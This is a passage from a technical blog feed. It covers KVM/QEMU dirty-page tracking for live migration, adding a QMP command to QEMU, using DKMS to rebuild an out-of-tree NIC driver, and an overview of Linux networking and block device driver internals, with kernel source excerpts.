memslot->dirty_bitmap = kvm_kvzalloc(dirty_bytes);
if (!memslot->dirty_bitmap)
return -ENOMEM;
return 0;
}
</code></pre></div></div>
<p>Then it goes to ‘kvm_arch_commit_memory_region’ and ‘kvm_mmu_slot_remove_write_access’.
Notice, this is not the newest implementation but an old kernel (3.13).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void kvm_mmu_slot_remove_write_access(struct kvm *kvm, int slot)
{
struct kvm_memory_slot *memslot;
gfn_t last_gfn;
int i;
memslot = id_to_memslot(kvm->memslots, slot);
last_gfn = memslot->base_gfn + memslot->npages - 1;
spin_lock(&kvm->mmu_lock);
for (i = PT_PAGE_TABLE_LEVEL;
i < PT_PAGE_TABLE_LEVEL + KVM_NR_PAGE_SIZES; ++i) {
unsigned long *rmapp;
unsigned long last_index, index;
rmapp = memslot->arch.rmap[i - PT_PAGE_TABLE_LEVEL];
last_index = gfn_to_index(last_gfn, memslot->base_gfn, i);
for (index = 0; index <= last_index; ++index, ++rmapp) {
if (*rmapp)
__rmap_write_protect(kvm, rmapp, false);
if (need_resched() || spin_needbreak(&kvm->mmu_lock)) {
kvm_flush_remote_tlbs(kvm);
cond_resched_lock(&kvm->mmu_lock);
}
}
}
kvm_flush_remote_tlbs(kvm);
spin_unlock(&kvm->mmu_lock);
}
</code></pre></div></div>
<p>As the function name implies, it removes write access for this memory slot.</p>
<p>Here we just focus on normal 4K pages, not 2M and 1G pages. ‘memslot->arch.rmap’ is a gfn->spte map: given a gfn we can find the corresponding spte.</p>
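<p>The rmap idea can be sketched like this (a toy model with our own names and fixed sizes, not the kernel’s layout):</p>

```c
#include <assert.h>
#include <stddef.h>

/* Toy model of the rmap (names ours): for each gfn of a slot, an array
 * entry holds pointers to the sptes mapping it, so write protection can
 * walk from gfn straight to every spte without scanning page tables. */
#define SLOT_PAGES      8
#define MAX_SPTES       4
#define PT_WRITABLE_BIT (1u << 1)

static unsigned *rmap[SLOT_PAGES][MAX_SPTES];  /* gfn -> sptes mapping it */

static void rmap_add(int gfn, unsigned *sptep)
{
    for (int i = 0; i < MAX_SPTES; i++)
        if (!rmap[gfn][i]) {
            rmap[gfn][i] = sptep;
            return;
        }
}

/* like __rmap_write_protect: clear the writable bit of every spte */
static void rmap_write_protect(int gfn)
{
    for (int i = 0; i < MAX_SPTES; i++)
        if (rmap[gfn][i])
            *rmap[gfn][i] &= ~PT_WRITABLE_BIT;
}
```
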
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool __rmap_write_protect(struct kvm *kvm, unsigned long *rmapp,
bool pt_protect)
{
u64 *sptep;
struct rmap_iterator iter;
bool flush = false;
for (sptep = rmap_get_first(*rmapp, &iter); sptep;) {
BUG_ON(!(*sptep & PT_PRESENT_MASK));
if (spte_write_protect(kvm, sptep, &flush, pt_protect)) {
sptep = rmap_get_first(*rmapp, &iter);
continue;
}
sptep = rmap_get_next(&iter);
}
return flush;
}
static bool
spte_write_protect(struct kvm *kvm, u64 *sptep, bool *flush, bool pt_protect)
{
u64 spte = *sptep;
if (!is_writable_pte(spte) &&
!(pt_protect && spte_is_locklessly_modifiable(spte)))
return false;
rmap_printk("rmap_write_protect: spte %p %llx\n", sptep, *sptep);
if (__drop_large_spte(kvm, sptep)) {
*flush |= true;
return true;
}
if (pt_protect)
spte &= ~SPTE_MMU_WRITEABLE;
spte = spte & ~PT_WRITABLE_MASK;
*flush |= mmu_spte_update(sptep, spte);
return false;
}
</code></pre></div></div>
<p>So here for every gfn, we remove the write access. After returning from this ioctl, the guest’s RAM
has been marked without write access; every write to it will exit to KVM and mark the page dirty. This is what ‘start the dirty log’ means.</p>
<p>When the guest writes the memory, it triggers an EPT violation vmexit, which calls ‘tdp_page_fault’.
Because this is caused by write protection, the CPU sets the error code to ‘PFERR_WRITE_MASK’, so ‘fast_page_fault’
and ‘fast_pf_fix_direct_spte’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool
fast_pf_fix_direct_spte(struct kvm_vcpu *vcpu, u64 *sptep, u64 spte)
{
struct kvm_mmu_page *sp = page_header(__pa(sptep));
gfn_t gfn;
WARN_ON(!sp->role.direct);
/*
* The gfn of direct spte is stable since it is calculated
* by sp->gfn.
*/
gfn = kvm_mmu_page_get_gfn(sp, sptep - sp->spt);
if (cmpxchg64(sptep, spte, spte | PT_WRITABLE_MASK) == spte)
mark_page_dirty(vcpu->kvm, gfn);
return true;
}
void mark_page_dirty(struct kvm *kvm, gfn_t gfn)
{
struct kvm_memory_slot *memslot;
memslot = gfn_to_memslot(kvm, gfn);
mark_page_dirty_in_slot(kvm, memslot, gfn);
}
void mark_page_dirty_in_slot(struct kvm *kvm, struct kvm_memory_slot *memslot,
gfn_t gfn)
{
if (memslot && memslot->dirty_bitmap) {
unsigned long rel_gfn = gfn - memslot->base_gfn;
set_bit_le(rel_gfn, memslot->dirty_bitmap);
}
}
</code></pre></div></div>
<p>Here we can see it sets the spte writable again and sets the bit in the dirty bitmap.</p>
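<p>Putting the two halves together, the write-protect logging cycle looks like this toy model (names ours):</p>

```c
#include <assert.h>

/* Sketch (names ours) of the write-protect logging cycle: starting the
 * log clears the writable bit of a page's spte; the first guest write
 * faults, restores the bit and marks the page dirty, so further writes
 * to the same page cost nothing until the page is re-protected. */
#define PT_WRITABLE (1u << 1)

struct page_entry {
    unsigned spte;  /* simplified shadow/EPT entry for one page */
    int dirty;      /* this page's bit in the dirty bitmap       */
};

static void start_logging(struct page_entry *p)
{
    p->spte &= ~PT_WRITABLE;       /* like __rmap_write_protect */
}

/* returns 1 if this write took a write-protect fault */
static int guest_write(struct page_entry *p)
{
    if (p->spte & PT_WRITABLE)
        return 0;                  /* already writable: no exit */
    p->spte |= PT_WRITABLE;        /* like fast_pf_fix_direct_spte */
    p->dirty = 1;                  /* like mark_page_dirty_in_slot */
    return 1;
}
```

<p>Only the first write after each (re-)protection pays for an exit, which keeps dirty logging cheap for write-hot pages between two sync rounds.</p>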
<h3> qemu sync dirty log with kvm </h3>
<p>Let’s go back to ‘ram_save_init_globals’. After telling kvm to start the dirty log, it calls ‘migration_bitmap_sync’.
This function calls ‘memory_global_dirty_log_sync’ to get the dirty map from kvm; ‘kvm_log_sync’ is used to do this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void kvm_log_sync(MemoryListener *listener,
MemoryRegionSection *section)
{
KVMMemoryListener *kml = container_of(listener, KVMMemoryListener, listener);
int r;
r = kvm_physical_sync_dirty_bitmap(kml, section);
if (r < 0) {
abort();
}
}
static int kvm_physical_sync_dirty_bitmap(KVMMemoryListener *kml,
MemoryRegionSection *section)
{
KVMState *s = kvm_state;
unsigned long size, allocated_size = 0;
struct kvm_dirty_log d = {};
KVMSlot *mem;
int ret = 0;
hwaddr start_addr = section->offset_within_address_space;
hwaddr end_addr = start_addr + int128_get64(section->size);
d.dirty_bitmap = NULL;
while (start_addr < end_addr) {
mem = kvm_lookup_overlapping_slot(kml, start_addr, end_addr);
if (mem == NULL) {
break;
}
...
size = ALIGN(((mem->memory_size) >> TARGET_PAGE_BITS),
/*HOST_LONG_BITS*/ 64) / 8;
if (!d.dirty_bitmap) {
d.dirty_bitmap = g_malloc(size);
} else if (size > allocated_size) {
d.dirty_bitmap = g_realloc(d.dirty_bitmap, size);
}
allocated_size = size;
memset(d.dirty_bitmap, 0, allocated_size);
d.slot = mem->slot | (kml->as_id << 16);
if (kvm_vm_ioctl(s, KVM_GET_DIRTY_LOG, &d) == -1) {
DPRINTF("ioctl failed %d\n", errno);
ret = -1;
break;
}
kvm_get_dirty_pages_log_range(section, d.dirty_bitmap);
start_addr = mem->start_addr + mem->memory_size;
}
g_free(d.dirty_bitmap);
return ret;
}
</code></pre></div></div>
<p>Here we can see that QEMU issues a ‘KVM_GET_DIRTY_LOG’ ioctl. In KVM:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_vm_ioctl_get_dirty_log(struct kvm *kvm, struct kvm_dirty_log *log)
{
int r;
struct kvm_memory_slot *memslot;
unsigned long n, i;
unsigned long *dirty_bitmap;
unsigned long *dirty_bitmap_buffer;
bool is_dirty = false;
mutex_lock(&kvm->slots_lock);
r = -EINVAL;
if (log->slot >= KVM_USER_MEM_SLOTS)
goto out;
memslot = id_to_memslot(kvm->memslots, log->slot);
dirty_bitmap = memslot->dirty_bitmap;
r = -ENOENT;
if (!dirty_bitmap)
goto out;
n = kvm_dirty_bitmap_bytes(memslot);
dirty_bitmap_buffer = dirty_bitmap + n / sizeof(long);
memset(dirty_bitmap_buffer, 0, n);
spin_lock(&kvm->mmu_lock);
for (i = 0; i < n / sizeof(long); i++) {
unsigned long mask;
gfn_t offset;
if (!dirty_bitmap[i])
continue;
is_dirty = true;
mask = xchg(&dirty_bitmap[i], 0);
dirty_bitmap_buffer[i] = mask;
offset = i * BITS_PER_LONG;
kvm_mmu_write_protect_pt_masked(kvm, memslot, offset, mask);
}
if (is_dirty)
kvm_flush_remote_tlbs(kvm);
spin_unlock(&kvm->mmu_lock);
r = -EFAULT;
if (copy_to_user(log->dirty_bitmap, dirty_bitmap_buffer, n))
goto out;
r = 0;
out:
mutex_unlock(&kvm->slots_lock);
return r;
}
</code></pre></div></div>
<p>It copies the dirty bitmap to userspace and also write-protects the SPTEs again using ‘kvm_mmu_write_protect_pt_masked’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void kvm_mmu_write_protect_pt_masked(struct kvm *kvm,
struct kvm_memory_slot *slot,
gfn_t gfn_offset, unsigned long mask)
{
unsigned long *rmapp;
while (mask) {
rmapp = __gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
PT_PAGE_TABLE_LEVEL, slot);
__rmap_write_protect(kvm, rmapp, false);
/* clear the first set bit */
mask &= mask - 1;
}
}
</code></pre></div></div>
<p>So the next time the guest writes to this page, it will be marked dirty again.</p>
<p>kvm_get_dirty_pages_log_range–>cpu_physical_memory_set_dirty_lebitmap.</p>
<p>In the latter function, it sets the dirty bitmap in ‘ram_list.dirty_memory[i]->blocks’.
This dirty bitmap lives in ‘ram_list’, not in the migration code.</p>
<h3> qemu copy dirty bitmap to migration bitmap </h3>
<p>In ‘migration_bitmap_sync’, after the call to ‘memory_global_dirty_log_sync’,
‘migration_bitmap_sync_range’ is called for every block. This copies ‘ram_list’’s
dirty bitmap to ‘migration_bitmap_rcu->bmap’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void migration_bitmap_sync_range(ram_addr_t start, ram_addr_t length)
{
unsigned long *bitmap;
bitmap = atomic_rcu_read(&migration_bitmap_rcu)->bmap;
migration_dirty_pages +=
cpu_physical_memory_sync_dirty_bitmap(bitmap, start, length);
}
static inline
uint64_t cpu_physical_memory_sync_dirty_bitmap(unsigned long *dest,
ram_addr_t start,
ram_addr_t length)
{
ram_addr_t addr;
unsigned long page = BIT_WORD(start >> TARGET_PAGE_BITS);
uint64_t num_dirty = 0;
/* start address is aligned at the start of a word? */
if (((page * BITS_PER_LONG) << TARGET_PAGE_BITS) == start) {
...
src = atomic_rcu_read(
&ram_list.dirty_memory[DIRTY_MEMORY_MIGRATION])->blocks;
for (k = page; k < page + nr; k++) {
if (src[idx][offset]) {
unsigned long bits = atomic_xchg(&src[idx][offset], 0);
unsigned long new_dirty;
new_dirty = ~dest[k];
dest[k] |= bits;
new_dirty &= bits;
num_dirty += ctpopl(new_dirty);
}
...
return num_dirty;
}
</code></pre></div></div>
<p>Now ‘migration_bitmap_rcu->bmap’ knows all the dirty pages. Of course, this is not very useful during
the setup phase, as QEMU has already set every bit of ‘migration_bitmap_rcu->bmap’ to 1.</p>
<h3> find the dirty pages and send out </h3>
<p>After setup, we come to the most important part: iteratively sending pages to the destination and, once a watermark
is reached, stopping the machine and sending all remaining dirty pages. The overview can be summarized as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>while (s->state == MIGRATION_STATUS_ACTIVE ||
s->state == MIGRATION_STATUS_POSTCOPY_ACTIVE) {
...
if (!qemu_file_rate_limit(s->to_dst_file)) {
uint64_t pend_post, pend_nonpost;
qemu_savevm_state_pending(s->to_dst_file, max_size, &pend_nonpost,
&pend_post);
...
if (pending_size && pending_size >= max_size) {
/* Still a significant amount to transfer */
if (migrate_postcopy_ram() &&
s->state != MIGRATION_STATUS_POSTCOPY_ACTIVE &&
pend_nonpost <= max_size &&
atomic_read(&s->start_postcopy)) {
if (!postcopy_start(s, &old_vm_running)) {
current_active_state = MIGRATION_STATUS_POSTCOPY_ACTIVE;
entered_postcopy = true;
}
continue;
}
/* Just another iteration step */
qemu_savevm_state_iterate(s->to_dst_file, entered_postcopy);
} else {
trace_migration_thread_low_pending(pending_size);
migration_completion(s, current_active_state,
&old_vm_running, &start_time);
break;
}
}
}
</code></pre></div></div>
<p>This shows the three most important functions: ‘qemu_savevm_state_pending’, ‘qemu_savevm_state_iterate’ and
‘migration_completion’. For RAM, the pending function is ‘ram_save_pending’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void ram_save_pending(QEMUFile *f, void *opaque, uint64_t max_size,
uint64_t *non_postcopiable_pending,
uint64_t *postcopiable_pending)
{
uint64_t remaining_size;
remaining_size = ram_save_remaining() * TARGET_PAGE_SIZE;
if (!migration_in_postcopy(migrate_get_current()) &&
remaining_size < max_size) {
qemu_mutex_lock_iothread();
rcu_read_lock();
migration_bitmap_sync();
rcu_read_unlock();
qemu_mutex_unlock_iothread();
remaining_size = ram_save_remaining() * TARGET_PAGE_SIZE;
}
/* We can do postcopy, and all the data is postcopiable */
*postcopiable_pending += remaining_size;
}
</code></pre></div></div>
<p>This function calls ‘migration_bitmap_sync’ to refresh the dirty page bitmap in ‘migration_bitmap_rcu->bmap’.
The iterate function ‘ram_save_iterate’ calls ‘ram_find_and_save_block’ to find the dirty pages and
send them to the destination host.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int ram_save_iterate(QEMUFile *f, void *opaque)
{
int ret;
int i;
int64_t t0;
int done = 0;
rcu_read_lock();
if (ram_list.version != last_version) {
reset_ram_globals();
}
/* Read version before ram_list.blocks */
smp_rmb();
ram_control_before_iterate(f, RAM_CONTROL_ROUND);
t0 = qemu_clock_get_ns(QEMU_CLOCK_REALTIME);
i = 0;
while ((ret = qemu_file_rate_limit(f)) == 0) {
int pages;
pages = ram_find_and_save_block(f, false, &bytes_transferred);
/* no more pages to sent */
if (pages == 0) {
done = 1;
break;
}
acct_info.iterations++;
/* we want to check in the 1st loop, just in case it was the 1st time
and we had to sync the dirty bitmap.
qemu_get_clock_ns() is a bit expensive, so we only check each some
iterations
*/
if ((i & 63) == 0) {
uint64_t t1 = (qemu_clock_get_ns(QEMU_CLOCK_REALTIME) - t0) / 1000000;
if (t1 > MAX_WAIT) {
DPRINTF("big wait: %" PRIu64 " milliseconds, %d iterations\n",
t1, i);
break;
}
}
i++;
}
...
return done;
}
</code></pre></div></div>
<p>‘ram_find_and_save_block–>get_queued_page’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool get_queued_page(MigrationState *ms, PageSearchStatus *pss,
ram_addr_t *ram_addr_abs)
{
RAMBlock *block;
ram_addr_t offset;
bool dirty;
do {
block = unqueue_page(ms, &offset, ram_addr_abs);
/*
* We're sending this page, and since it's postcopy nothing else
* will dirty it, and we must make sure it doesn't get sent again
* even if this queue request was received after the background
* search already sent it.
*/
if (block) {
unsigned long *bitmap;
bitmap = atomic_rcu_read(&migration_bitmap_rcu)->bmap;
dirty = test_bit(*ram_addr_abs >> TARGET_PAGE_BITS, bitmap);
if (!dirty) {
trace_get_queued_page_not_dirty(
block->idstr, (uint64_t)offset,
(uint64_t)*ram_addr_abs,
test_bit(*ram_addr_abs >> TARGET_PAGE_BITS,
atomic_rcu_read(&migration_bitmap_rcu)->unsentmap));
} else {
trace_get_queued_page(block->idstr,
(uint64_t)offset,
(uint64_t)*ram_addr_abs);
}
}
} while (block && !dirty);
if (block) {
/*
* As soon as we start servicing pages out of order, then we have
* to kill the bulk stage, since the bulk stage assumes
* in (migration_bitmap_find_and_reset_dirty) that every page is
* dirty, that's no longer true.
*/
ram_bulk_stage = false;
/*
* We want the background search to continue from the queued page
* since the guest is likely to want other pages near to the page
* it just requested.
*/
pss->block = block;
pss->offset = offset;
}
return !!block;
}
</code></pre></div></div>
<p>In this function we look up the dirty page in the bitmap.</p>
<p>The following shows the process of dirty bitmap tracking.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+-------------+ +----------+ +--------------+ +---------------------+
| | | ram_list +-----> | dirty_memory +--------> | migration_bitmap_rcu|
| | +----------+ +------+-------+ +---------------------+
| Guest | ^
| | |
| | |
| | |
| +--------------------------------+ |
| | | |
| | | |
| | | |
| | v |
| | |
| | +---------+ +-------+--------+
| | | memslot +-----> | dirty_bitmap |
+-------------+ +---------+ +----------------+
</code></pre></div></div>
Add a new qmp command for qemu 2018-07-25T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/07/25/add-new-qmp
<p>There is detailed <a href="https://github.com/qemu/qemu/blob/master/docs/devel/writing-qmp-commands.txt">documentation</a> on writing a new QMP command for QEMU; here I just make a note of it. As the documentation says, creating a new QMP command requires the following four steps:</p>
<ol>
<li>
<p>Define the command and any types it needs in the appropriate QAPI
schema module.</p>
</li>
<li>
<p>Write the QMP command itself, which is a regular C function. Preferably,
the command should be exported by some QEMU subsystem. But it can also be
added to the qmp.c file</p>
</li>
<li>
<p>At this point the command can be tested under the QMP protocol</p>
</li>
<li>
<p>Write the HMP command equivalent. This is not required and should only be
done if it does make sense to have the functionality in HMP. The HMP command
is implemented in terms of the QMP command</p>
</li>
</ol>
<p>The first step is to add the command to the qapi-schema.json file. Add the following to the end of the file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{ 'command': 'qmp-test', 'data': {'value': 'int'} }
</code></pre></div></div>
<p>Second, add the QMP processing function; add the following function to the qmp.c file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int test_a = 0;
void qmp_qmp_test(int64_t value, Error **errp)
{
if (value > 100 || value < 0)
{
error_setg(errp, QERR_INVALID_PARAMETER_VALUE, "value a", "not valid");
return;
}
test_a = value;
}
</code></pre></div></div>
<p>At this point, we can send the QMP command to QEMU.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"execute":"qmp-test","arguments":{"value":80}}
</code></pre></div></div>
<p>We often also want a more human-readable command, so we can add an HMP command.</p>
<p>Add the following to the middle of hmp-commands.hx:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
.name = "qmp-test",
.args_type = "value:i",
.params = "value",
.help = "set test a.",
.cmd = hmp_qmp_test,
},
STEXI
@item qmp-test @var{value}
Set test a to @var{value}.
ETEXI
</code></pre></div></div>
<p>Add the following to the end of the hmp.c file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void hmp_qmp_test(Monitor *mon, const QDict *qdict)
{
int64_t value = qdict_get_int(qdict, "value");
qmp_qmp_test(value, NULL);
}
</code></pre></div></div>
<p>Add the following to the end of the hmp.h file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void hmp_qmp_test(Monitor *mon, const QDict *qdict);
</code></pre></div></div>
<p>After compiling QEMU, we can use the ‘qmp-test 80’ command in the monitor.</p>
dkms 1012018-07-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/07/14/dkms-101
<p>Loadable kernel modules are very useful for dynamically adding functionality to the running kernel.
Since Linux is free, we can update or install new kernels easily. On some distributions, every time we install a new kernel we need to recompile the out-of-tree modules at the same time. This is tedious and can sometimes cause harm. This is where Dynamic Kernel Module Support (DKMS) comes in. DKMS is a program/framework for building Linux kernel modules whose sources generally reside outside the kernel source tree, and DKMS-managed modules are automatically rebuilt when a new kernel is installed.</p>
<p>This article focuses on how to use DKMS, not on its internals.</p>
<p>Let’s use the x710 network card VF driver as an example.</p>
<h3> No DKMS </h3>
<p>First, let’s look at the system’s built-in i40evf driver.</p>
<p><img src="/assets/img/dkms/1.png" alt="" /></p>
<p>Here it has an older version of the driver. We manually override it with a newer version.</p>
<p><img src="/assets/img/dkms/2.png" alt="" /></p>
<p>It works. Now let’s upgrade the distribution, which also updates the kernel.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt-get dist-upgrade
</code></pre></div></div>
<p>Looking at i40evf again, it has rolled back to the older version. If we want to use the newer i40evf, we need to compile it again.</p>
<p><img src="/assets/img/dkms/3.png" alt="" /></p>
<h3> With DKMS </h3>
<p>First, we need to move the source files into the /usr/src directory, for example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/src/i40evf-3.4.2
</code></pre></div></div>
<p>Note that the i40evf-3.4.2 directory here is the src directory from i40evf-3.4.2.tar.gz.</p>
<p>In this directory we need to create a file named dkms.conf with the following content:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian91:/usr/src/i40evf-3.4.2# cat dkms.conf
PACKAGE_NAME="i40evf"
PACKAGE_VERSION="3.4.2"
CLEAN="make clean"
BUILT_MODULE_NAME[0]="i40evf"
DEST_MODULE_LOCATION[0]="/updates"
AUTOINSTALL="yes"
</code></pre></div></div>
<p>Then install the dkms package.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt-get install dkms
</code></pre></div></div>
<p><img src="/assets/img/dkms/4.png" alt="" /></p>
<p>Don’t forget to install the linux-headers package needed to build the module.</p>
<p>Now the i40evf has been updated to 3.4.2.</p>
<p><img src="/assets/img/dkms/5.png" alt="" /></p>
<p>Upgrade the distribution and reboot.</p>
<p><img src="/assets/img/dkms/6.png" alt="" /></p>
<p>From the md5 checksum we can confirm that the i40evf module has been rebuilt automatically.</p>
<p>‘dkms status’ also shows the installed DKMS modules.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian91:~# dkms status
i40evf, 3.4.2, 4.9.0-3-amd64, x86_64: installed
i40evf, 3.4.2, 4.9.0-6-amd64, x86_64: installed
</code></pre></div></div>
Linux kernel networking: a general introduction2018-06-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/17/linux-net-general-intro
<p>Linux networking originates from BSD sockets, just like in most Unix-like operating systems; the protocol suite is known as TCP/IP. Conceptually, the TCP/IP stack contains four layers: the top-most is the application layer, then the transport layer, next the IP layer and finally the data link layer. The Linux networking stack is very complicated, so this article only covers the general architecture. The following articles will contain more details, though I don’t know how many there will be.</p>
<p>As we know, there are many protocols in the kernel and many kinds of physical network cards in the world. Linux needs to separate the common code from the code specific to each protocol and device, so function pointers are everywhere in the network subsystem (and, in fact, everywhere in the Linux kernel).
The following picture shows the Linux core network architecture.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +--------------------------+
| system call interface |
+--------------------------+
+------------------------------+
| protocol agnostic interface |
+------------------------------+
+------------------------------+
| network protocols |
+------+------+-------+--------+
| | | | |
| inet | dccp | sctp | packet |
| | | | |
+------+------+-------+--------+
+------------------------------+
| device agnostic interface |
+------------------------------+
+------------------------------+
| device drivers |
+------+------+-------+--------+
| | | | |
|e1000 | virtio vmxnet| ... |
| | | | |
+------+------+-------+--------+
</code></pre></div></div>
<h3 id="system-call-inteface">System call interface</h3>
<p>This is easy to understand: all Unix-like operating systems have the same system call interface. socket, bind, listen, accept, connect and some other system calls are available on every one of them. The socket is also abstracted as a file descriptor, and userspace interacts with the kernel through this fd.</p>
<h3 id="protocol-agnostic-interface">protocol agnostic interface</h3>
<p>This is the struct ‘sock’. While struct ‘socket’ connects to the VFS (the fd) for userspace, ‘sock’ connects to the protocols below.</p>
<h3 id="network-protocols">network protocols</h3>
<p>This layer defines many network protocols, for example the IPv4 stack, ipx, irda and the other directories under linux/net. Every protocol stack has a ‘family’; for IPv4 it is ‘inet_family_ops’. During initialization, the kernel adds protocols such as TCP and UDP to the family.</p>
<h3 id="device-agnostic-interface">device agnostic interface</h3>
<p>This layer connects the protocols to the various network devices. It contains the common interface: for example, a device driver can register a network card with ‘register_netdevice’ and send packets with ‘dev_queue_xmit’. None of these are tied to a specific protocol or a specific network device.</p>
<h3 id="device-driver">device driver</h3>
<p>This layer consists of the physical network card drivers that finally do the packet send and receive work. There are many network device drivers in the linux/drivers/net directory.</p>
<p>The next articles will discuss this general picture in more detail. Stay hungry, stay foolish.</p>
<h3 id="reference">reference</h3>
<p>Anatomy of the Linux networking stack</p>
Anatomy of the Linux block device driver2018-06-14T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/14/linux-block-device-driver
<p>In Linux device drivers, block devices differ from the char devices we discussed before. In this article we will discuss the block device driver.</p>
<h3 id="block-subsystem-initialization">block subsystem initialization</h3>
<p>Block subsystem is initialized in ‘genhd_device_init’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __init genhd_device_init(void)
{
int error;
block_class.dev_kobj = sysfs_dev_block_kobj;
error = class_register(&block_class);
if (unlikely(error))
return error;
bdev_map = kobj_map_init(base_probe, &block_class_lock);
blk_dev_init();
register_blkdev(BLOCK_EXT_MAJOR, "blkext");
/* create top-level block dir */
if (!sysfs_deprecated)
block_depr = kobject_create_and_add("block", NULL);
return 0;
}
</code></pre></div></div>
<p>‘block_class’ represents the ‘/dev/block’ directory.
‘bdev_map’ is a ‘struct kobj_map’, which we discussed in the char device driver article.
The initialization work is quite simple.</p>
<h3 id="register-block-devices-number">register block device’s number</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int register_blkdev(unsigned int major, const char *name)
{
struct blk_major_name **n, *p;
int index, ret = 0;
mutex_lock(&block_class_lock);
/* temporary */
if (major == 0) {
for (index = ARRAY_SIZE(major_names)-1; index > 0; index--) {
if (major_names[index] == NULL)
break;
}
if (index == 0) {
printk("register_blkdev: failed to get major for %s\n",
name);
ret = -EBUSY;
goto out;
}
major = index;
ret = major;
}
p = kmalloc(sizeof(struct blk_major_name), GFP_KERNEL);
if (p == NULL) {
ret = -ENOMEM;
goto out;
}
p->major = major;
strlcpy(p->name, name, sizeof(p->name));
p->next = NULL;
index = major_to_index(major);
for (n = &major_names[index]; *n; n = &(*n)->next) {
if ((*n)->major == major)
break;
}
if (!*n)
*n = p;
else
ret = -EBUSY;
if (ret < 0) {
printk("register_blkdev: cannot get major %d for %s\n",
major, name);
kfree(p);
}
out:
mutex_unlock(&block_class_lock);
return ret;
}
static struct blk_major_name {
struct blk_major_name *next;
int major;
char name[16];
} *major_names[BLKDEV_MAJOR_HASH_SIZE];
</code></pre></div></div>
<p>‘register_blkdev’ is much like ‘register_chrdev_region’, except that the former uses ‘major_names’. ‘register_blkdev’ manages the block device major numbers.</p>
<h3 id="block_device">block_device</h3>
<p>‘block_device’ represents a logical block device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct block_device {
dev_t bd_dev; /* not a kdev_t - it's a search key */
int bd_openers;
struct inode * bd_inode; /* will die */
struct super_block * bd_super;
struct mutex bd_mutex; /* open/close mutex */
struct list_head bd_inodes;
void * bd_claiming;
void * bd_holder;
int bd_holders;
bool bd_write_holder;
#ifdef CONFIG_SYSFS
struct list_head bd_holder_disks;
#endif
struct block_device * bd_contains;
unsigned bd_block_size;
struct hd_struct * bd_part;
/* number of times partitions within this device have been opened. */
unsigned bd_part_count;
int bd_invalidated;
struct gendisk * bd_disk;
struct request_queue * bd_queue;
struct list_head bd_list;
/*
* Private data. You must have bd_claim'ed the block_device
* to use this. NOTE: bd_claim allows an owner to claim
* the same device multiple times, the owner must take special
* care to not mess up bd_private for that case.
*/
unsigned long bd_private;
/* The counter of freeze processes */
int bd_fsfreeze_count;
/* Mutex for freeze */
struct mutex bd_fsfreeze_mutex;
};
</code></pre></div></div>
<p>This struct can represent either a complete logical block device or a partition of one. For a complete block device, ‘bd_part’ holds the device’s partition info; for a partition, ‘bd_contains’ points to the block device it belongs to. When a block device or one of its partitions is opened, the kernel creates a ‘block_device’, as we will discuss later. ‘block_device’ connects the virtual file system with the block device driver, so the driver itself has little control over it. ‘block_device’ is often used together with the ‘bdev’ filesystem.</p>
<h3 id="struct-gendisk">struct gendisk</h3>
<p>struct gendisk represents a real disk. It is allocated and controlled by the block device driver.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct gendisk {
/* major, first_minor and minors are input parameters only,
* don't use directly. Use disk_devt() and disk_max_parts().
*/
int major; /* major number of driver */
int first_minor;
int minors; /* maximum number of minors, =1 for
* disks that can't be partitioned. */
char disk_name[DISK_NAME_LEN]; /* name of major driver */
char *(*devnode)(struct gendisk *gd, umode_t *mode);
unsigned int events; /* supported events */
unsigned int async_events; /* async events, subset of all */
/* Array of pointers to partitions indexed by partno.
* Protected with matching bdev lock but stat and other
* non-critical accesses use RCU. Always access through
* helpers.
*/
struct disk_part_tbl __rcu *part_tbl;
struct hd_struct part0;
const struct block_device_operations *fops;
struct request_queue *queue;
void *private_data;
int flags;
struct device *driverfs_dev; // FIXME: remove
struct kobject *slave_dir;
struct timer_rand_state *random;
atomic_t sync_io; /* RAID */
struct disk_events *ev;
